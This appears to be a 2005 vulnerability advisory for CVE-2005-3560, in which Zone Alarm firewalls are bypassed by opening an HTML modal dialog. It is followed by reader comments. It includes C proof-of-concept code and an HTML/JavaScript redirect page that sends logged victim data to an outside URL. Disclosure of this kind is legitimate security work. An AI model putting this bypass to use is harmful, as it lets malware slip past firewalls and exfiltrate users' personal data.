|
|
| |
"Zone Alarm Pro and Internet Security Suite are firewall programs for Microsoft Windows."
By exploiting Zone Lab's trust in certain web based programs, malicious programs can bypass Zone Alarm Pro and Internet Security Suite protection and send information about the system to attackers. |
| |
Credit:
The information has been provided by Debasis Mohanty.
The original article can be found at: http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html
|
| |
Vulnerable Systems:
* Zone Alarm Pro version 6.0.x
* Zone Alarm Internet Security Suit version 6.0.x
* Zone Alarm Firewall with Anti-Spyware version 6.1.x
* Zone Alarm Firewall with Anti-Virus version 6.0.x
* Zone Alarm Firewall (Free Version) version 6.0.x
Zone Alarm products with Advance Program Control or OS Firewall Technology enabled, detects and blocks almost all those APIs (like Shell, ShellExecuteEx, SetWindowText, SetDlgItem etc) which are commonly used by malicious programs to send data via http by piggybacking over other trusted programs. However, it is still possible for a malicious program (Trojans or worms etc) to make outbound connections to the evil site by piggybacking over trusted Internet browser using "HTML Modal Dialog" in conjunction with simple "JavaScript". Here it is assumed that the default browser (IE or Firefox etc) has authorization to access internet. In case of the default installation of ZoneAlarm Pro, IE is by default allowed to access internet.
By using ShowHTMLDialog() method, it is possible for any malicious program to create a modal dialog box that displays HTML. This in turn can be used to redirect the page to the attacker's site. It is observed that using this method, ZA Pro and Internet Security Suit is unable to block internet access. This method can be used by any malicious program to send data outside via http to the attacker and at the same time it can also receive the command instructions from the attacker.
On successful exploitation the malicious program will be able to send the victim's details and personal system information to the attacker and this can further leads to complete system compromise.
Proof of-Concept:
osfwbypass-demo.c:
BOOL LoadHtmlDialog(void)
{
HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL"));
if (hinstMSHTML)
{
SHOWHTMLDIALOGFN* pfnShowHTMLDialog;
// Open a Modal Dialog box of HTML content type
pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML, TEXT("ShowHTMLDialog"));
if (pfnShowHTMLDialog)
{
IMoniker *pURLMoniker;
// Invoke the html file containing the data to be sent via http
BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm");
CreateURLMoniker(NULL, bstrURL, &pURLMoniker);
if (pURLMoniker)
{
(*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
pURLMoniker->Release();
}
SysFreeString(bstrURL);
}
FreeLibrary(hinstMSHTML);
}
Return True;
}
/* Eof */
modal-dialog.htm:
< html>
< head>
< meta http-equiv="Content-Language" content="en-us">
< title>Redirection Dialog< / title>
< script language="JavaScript">
< ! - - Here goes the information logged by the malicious program which will
be sent to the evil site via http request -->
var sTargetURL = "http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[YourInformation Here] window.location.href = sTargetURL;
window.close;
< / script>
< / head>
< / html>
CVE Information:
CVE-2005-3560
Disclosure Timeline:
10th Oct, 2005 - Bug Originally Discovered
15th Oct, 2005 - Vendor Reported
15th Oct, 2005 - Vendor acknowledged the report
17th Oct, 2005 - Vendor asked for more information
19th Oct, 2005 - Vendor provided with more information and the version info on which the exploit was tested.
29th Oct, 2005 - Final follow up with the vendor but no response
8th Nov, 2005 - Public Disclosure
|
|
|
| Subject:
|
Doesnt suprise me |
Date: |
5 Dec. 2005 |
| From: |
none |
| I had a issue with removing za and having my internet connection break totally. I had to reinstall ZA then delete every thing but vsmon and leave it running other wise no internet. I moved to sygate well before this and as always was checking out software. Well I never was able to remove ZA with out breaking my internet connection. I was stuck with it till i was able to reformat my computer. They never offered me any help and only pointed me to instructions on removing za so that i could do a clean install of za. Tried them and was left with out internet. |
|
| Subject:
|
Kerio Personal Firewall 4.2.2 is also vulnerable! |
Date: |
6 Dec. 2005 |
| From: |
Andry |
| I've tested with Kerio Personal Firewall 4.2.2 and it's vulnerable as well. |
|
| Subject:
|
How to find a fix |
Date: |
7 Dec. 2005 |
| From: |
bcifrespeedy.com.ar |
Is there ant fix that exist for this problem? How can I find out if my firewall work good and not vulnerable ?
Thank you |
|
| Subject:
|
Kaspersky Firewall and Norton 2005 firewall are both vulnerable |
Date: |
7 Dec. 2005 |
| From: |
Mark |
| Kaspersky Firewall and Norton 2005 firewall are both vulnerable |
|
| Subject:
|
lavasoft firewall has this exploit |
Date: |
8 Dec. 2005 |
| From: |
boxitas |
I installed the new lavasoft firewall 5 days ago and it has the same exploit as stated above .i saw it for my self last night i want to test it under the most risky sites and that porn site (as a test).
And i found that it block very well till one of the sites did a redirect to another page using the click back to last page. and it happened atleast adozen times. |
|
| Subject:
|
I learned about this the hard way |
Date: |
25 Aug. 2006 |
| From: |
Pete |
My ZA crashed suddenly, with an error message. Had the X icon in the systray. I re-started ZA and started a virus scan and went to bed. When I woke up the screen was black, with an error message telling me that there was a boot read problem. I checked the drive with system mechanic: MBR & partition both OK. Hooked the drive to my Linux box to see if I could see the contents of the drive. No joy: there wasn't any contents. Put the drive back in the Wintel box and re-imaged with the restore disk. Worked fine. Good thiing the data was backed up.
I don't know if something got in or someone got in, but the effect was the same: the content of the drive was completely wiped.
Anyone know how to block this thing? Contact me at macghee@hotmail.com |
|
|
|
|
